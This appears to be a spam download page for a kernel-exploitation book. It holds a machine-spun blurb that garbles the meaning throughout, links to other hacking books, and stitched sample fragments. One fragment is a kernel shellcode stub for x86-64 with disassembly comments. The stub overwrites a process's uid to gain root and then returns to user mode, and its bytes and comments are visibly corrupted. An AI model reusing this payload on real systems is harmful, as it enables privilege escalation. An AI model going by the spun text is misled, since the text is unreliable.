Enrico Perla B.Sc. Computer Science University of Torino 's A Guide to Kernel Exploitation: Attacking the Core PDF

By Enrico Perla B.Sc. Computer Science University of Torino M.Sc. Computer Science Trinity College Dublin, Massimiliano Oldani

ISBN-10: 1597494860

ISBN-13: 9781597494861

A consultant to Kernel Exploitation: Attacking the center discusses the theoretical ideas and ways had to improve trustworthy and potent kernel-level exploits, and applies them to various working structures, particularly, UNIX derivatives, Mac OS X, and home windows. innovations and strategies are awarded categorically in order that even if a particularly specified vulnerability has been patched, the foundational details supplied might help hackers in writing a more moderen, greater assault; or aid pen testers, auditors, and so forth boost a extra concrete layout and shielding constitution.
The booklet is equipped into 4 components. half I introduces the kernel and units out the theoretical foundation on which to construct the remainder of the ebook. half II specializes in diversified working structures and describes exploits for them that focus on quite a few trojan horse periods. half III on distant kernel exploitation analyzes the results of the distant state of affairs and offers new strategies to focus on distant concerns. It encompasses a step by step research of the advance of a competent, one-shot, distant make the most for a true vulnerabilitya trojan horse affecting the SCTP subsystem present in the Linux kernel. eventually, half IV wraps up the research on kernel exploitation and appears at what the longer term may possibly hold.

  • Covers a number of working process households ― UNIX derivatives, Mac OS X, Windows
  • Details universal situations comparable to commonly used reminiscence corruption (stack overflow, heap overflow, etc.) matters, logical insects and race conditions
  • Delivers the reader from user-land exploitation to the area of kernel-land (OS) exploits/attacks, with a specific specialize in the stairs that result in the production of profitable recommendations, to be able to supply to the reader anything greater than only a set of tricks

Show description

Read Online or Download A Guide to Kernel Exploitation: Attacking the Core PDF

Best hacking books

Download e-book for iPad: 2600 Magazine: The Hacker Quarterly (Spring 2012) by

2600 journal is the world's most excellent magazine on desktop hacking and technological manipulation and keep watch over. released by means of hackers on the grounds that 1984, 2600 is a real window into the minds of a few of today's such a lot inventive and clever humans. The de facto voice of a brand new new release, this book has its finger at the pulse of the ever-changing electronic panorama.

New PDF release: Seven Deadliest Microsoft Attacks (Seven Deadliest Attacks)

Do you want to take care of with the most recent hacks, assaults, and exploits effecting Microsoft items? you then want Seven Deadliest Microsoft assaults. This e-book pinpoints the main harmful hacks and exploits particular to Microsoft functions, laying out the anatomy of those assaults together with tips to make your method safer.

Download e-book for kindle: Professional Pen Testing for Web Applications by Andres Andreu

What the e-book Covers: the 1st chapters of the ebook reports the fundamentals of internet purposes and their protocols, particularly authentication features, as a launching pad for realizing the inherent protection vulnerabilities, coated later within the ebook. instantly after this insurance, the writer will get all the way down to fundamentals of knowledge safeguard, masking vulnerability research, assault simulation, and effects research, focusing the reader at the "outcomes" elements wanted for profitable pen checking out.

New PDF release: Certified Ethical Hacker (CEH) Foundation Guide

Arrange for the CEH education direction and examination by way of gaining a superior starting place of information of key basics reminiscent of working structures, databases, networking, programming, cloud, and virtualization. in accordance with this origin, the e-book strikes forward with easy techniques from the hacking international. The qualified moral Hacker (CEH) starting place advisor additionally takes you thru a number of occupation paths on hand upon crowning glory of the CEH direction and in addition prepares you to stand activity interviews whilst making use of as a moral hacker.

Additional info for A Guide to Kernel Exploitation: Attacking the Core

Sample text

Introducing the Kernel and the World of Kernel Exploitation char kernel_stub[] = "\xbe\xe8\x03\x00\x00" "x65\x48\x8b\x04\x25\x00\x00\x00\x00" "\x31\xc9" "\x81\xf9\x2c\x01\x00\x00" "\x74\x1c" "\x8b\x10" "\x39\xf2" "\x75\x0e" "\x8b\x50\x04" "\x39\xf2" "\x75\x07" "\x31\xd2" "\x89\x50\x04" "\xeb\x08" "\x48\x83\xc0\x04" "\xff\xc1" "\xeb\xdc" "\x0f\x01\xf8" "\x48\xc7\x44\x24\x20\x2b\x00\x00\x00" "\x48\xc7\x44\x24\x18\x11\x11\x11\x11" "\x48\xc7\x44\x24\x10\x46\x02\x00\x00" "\x48\xc7\x44\x24\x08\x23\x00\x00\x00" 32-bit , 33 64-bit cs */ "\x48\xc7\x04\x24\x22\x22\x22\x22" "\x48\xcf"; // // // // // mov mov xor cmp je $0x3e8,%esi %gs:0x0,%rax %ecx, %ecx (15 $0x12c,%ecx 400af0 // mov // cmp // jne (%rax),%edx %esi,%edx 400ae8 // mov // cmp // jne 0x4 (%rax),%edx %esi,%edx 400ae8 // xor // mov // jmp %edx,%edx %edx, 0x4(%rax) 400af0 // add // inc // jmp $0x4,%rax %ecx 400acc // // // // // swapgs (54 movq $0x2b, 0x20(%rsp) movq $0x11111111, 0x18(%rsp) movq $0x246,0x10(%rsp) movq $0x23, 0x8 (%rsp)/* 23 // movq $0x22222222,(%rsp) // iretq One of the goals of the attacker is to increase as much as possible the chances of successful execution flow redirection to the memory area where the shellcode is stored.

2007. Modern Operating Systems, Third Edition (Prentice Hall Press). , and Gagne, G. 2008. Operating System Concepts, Eighth Edition (Wiley). , and Cesati, M. 2005. Understanding the Linux Kernel, Third Edition (O’Reilly). Singh, A. 2006. Mac OS X Internals (Addison-Wesley Professional). , with Ionescu, A. 2009. Microsoft Windows Internals, Fifth Edition (Microsoft Press). , and McDougall, R. 2006. Solaris Internals, Second Edition (Prentice Hall PTR). Endnote 1. Solar Designer. Getting around non-executable stack (and fix).

There are two basic types of kernel memory: the kernel stack, which is associated to each thread/process whenever it runs at the kernel level, and the kernel heap, which is used each time a kernel path needs to allocate some small object or some temporary space. As we did for pointer corruption vulnerabilities (and as we will do throughout this chapter), we leave the details regarding exploitation of such issues for Chapter 3, (for generic approaches) and to the chapters in Part II of this book.

Download PDF sample

A Guide to Kernel Exploitation: Attacking the Core by Enrico Perla B.Sc. Computer Science University of Torino M.Sc. Computer Science Trinity College Dublin, Massimiliano Oldani

by Robert

Rated 4.10 of 5 – based on 23 votes